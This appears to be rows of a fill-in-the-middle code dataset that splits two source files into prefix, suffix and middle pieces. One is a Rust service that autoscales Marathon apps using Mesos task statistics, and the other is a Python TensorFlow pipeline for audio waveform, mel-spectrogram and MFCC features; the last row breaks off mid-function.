file_name (large_string, lengths 4-140) | prefix (large_string, lengths 0-39k) | suffix (large_string, lengths 0-36.1k) | middle (large_string, lengths 0-29.4k) | fim_type (large_string, 4 values)
---|---|---|---|---|
service.rs | use std::io::Read;
use std::sync::{Arc, Mutex};
use std::collections::HashMap;
use futures::{self, Future, BoxFuture};
use curl::easy::{Easy, List};
use tokio_core::reactor::Handle;
use tokio_curl::{Session, PerformError};
use serde_json::{from_value, from_str, Value};
pub type Fut<T> = BoxFuture<T, PerformError>;
#[derive(Debug)]
pub struct App {
pub name: String,
pub max_mem_usage: f64,
pub max_cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct | {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => {
max_instances = from_value(v.clone()).unwrap();
}
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
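            // CPU usage (%) is the growth in cumulative CPU seconds divided by
            // the wall-clock time elapsed since the previous sample, times 100.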
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response.into_owned()
}).boxed()
}
}
#[cfg(test)]
mod tests {
use tokio_core::reactor::Core;
#[test]
#[ignore]
fn test() {
let marathon_url = "http://localhost:8080";
let mesos_url = "http://localhost:5050";
let mut evloop = Core::new().unwrap();
let mut service = ::Service::new(evloop.handle(),
marathon_url.to_string(),
mesos_url.to_string(),
80.0, 80.0, 1.5, 10);
let fut = service.get_slaves();
let slaves = evloop.run(fut).unwrap();
let fut = service.get_apps();
let apps = evloop.run(fut).unwrap();
for id in apps {
let fut = service.get_app(&id);
let app = evloop.run(fut).unwrap().unwrap();
let fut = service.get_statistic(&app, &slaves, None);
let stat = evloop.run(fut).unwrap();
if app.name == "api" {
let fut = service.scale(&app);
evloop.run(fut).unwrap();
}
}
}
}
| Service | identifier_name |
service.rs | use std::io::Read;
use std::sync::{Arc, Mutex};
use std::collections::HashMap;
use futures::{self, Future, BoxFuture};
use curl::easy::{Easy, List};
use tokio_core::reactor::Handle;
use tokio_curl::{Session, PerformError};
use serde_json::{from_value, from_str, Value};
pub type Fut<T> = BoxFuture<T, PerformError>;
#[derive(Debug)]
pub struct App {
pub name: String,
pub max_mem_usage: f64,
pub max_cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct Service {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => |
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response.into_owned()
}).boxed()
}
}
#[cfg(test)]
mod tests {
use tokio_core::reactor::Core;
#[test]
#[ignore]
fn test() {
let marathon_url = "http://localhost:8080";
let mesos_url = "http://localhost:5050";
let mut evloop = Core::new().unwrap();
let mut service = ::Service::new(evloop.handle(),
marathon_url.to_string(),
mesos_url.to_string(),
80.0, 80.0, 1.5, 10);
let fut = service.get_slaves();
let slaves = evloop.run(fut).unwrap();
let fut = service.get_apps();
let apps = evloop.run(fut).unwrap();
for id in apps {
let fut = service.get_app(&id);
let app = evloop.run(fut).unwrap().unwrap();
let fut = service.get_statistic(&app, &slaves, None);
let stat = evloop.run(fut).unwrap();
if app.name == "api" {
let fut = service.scale(&app);
evloop.run(fut).unwrap();
}
}
}
}
| {
max_instances = from_value(v.clone()).unwrap();
} | conditional_block |
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
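    # e.g. a path like "<data_dir>/yes/clip_0001.wav" yields the label "yes"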
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot( | tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds | random_line_split |
|
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
|
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
